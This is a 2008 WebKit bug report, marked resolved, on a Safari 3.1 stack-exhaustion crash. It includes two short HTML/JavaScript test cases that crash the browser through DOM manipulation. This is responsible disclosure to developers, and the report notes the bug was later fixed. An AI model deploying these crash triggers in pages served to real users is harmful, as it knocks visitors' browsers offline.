Bug 19514 - DOM modification causes stack exhaustion (exact cause unknown)
Summary: DOM modification causes stack exhaustion (exact cause unknown)
Status: RESOLVED FIXED
Alias: None
Product: WebKit
Classification: Unclassified
Component: New Bugs (show other bugs)
Version: 525.x (Safari 3.1)
Hardware: PC Windows Vista
: P1 Critical
Assignee: Nobody
URL: http://skypher.com/SkyLined/Repro/Saf...
Keywords: InRadar
Depends on:
Blocks:
 
Reported: 2008-06-12 04:16 PDT by Berend-Jan Wever
Modified: 2016-11-28 17:30 PST (History)
2 users (show)

See Also:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Berend-Jan Wever 2008-06-12 04:16:13 PDT 
I found that the following javascript causes a stack exhaustion:

<BODY onload="go()"><SCRIPT>
    function go() {
        var oEmbed=document.createElement('embed');
        document.body.appendChild(oEmbed);
        var oEmbed2 = oEmbed.cloneNode();
        oEmbed2.appendChild(document.body.parentElement);
        var oA = document.createElement('a');
        document.title = '';
        oA.innerHTML = '<x><html></html>';
    }
</SCRIPT></BODY>

Tested with Safari 3.1.1.

Marked as security, I'm not sure if you treat DoS as a security issue, so erring on the safe side.
Comment 1 Berend-Jan Wever 2008-06-12 04:22:27 PDT 
(In reply to comment #0)
OOOPS. I copy+pasted the wrong code (see bug 19516). This is the real repro code for this case:
<BODY onload="go()"><SCRIPT>
    function go() {
        oStrike=document.createElement('b');
        oStrike.innerHTML='<object><table></table><colGroup></colGroup></object>';
        document.body.parentElement.appendChild(oStrike);
    }
</SCRIPT></BODY>
Comment 2 Berend-Jan Wever 2008-06-13 06:29:01 PDT 
Changing priority and security flag
Comment 3 Mark Rowe (bdash) 2008-06-13 14:52:30 PDT 
<rdar://problem/6007109>
Comment 4 mitz 2008-07-05 01:29:12 PDT 
I cannot reproduce in r35011. I think this bug was fixed along with bug 15919 in <http://trac.webkit.org/changeset/34692>.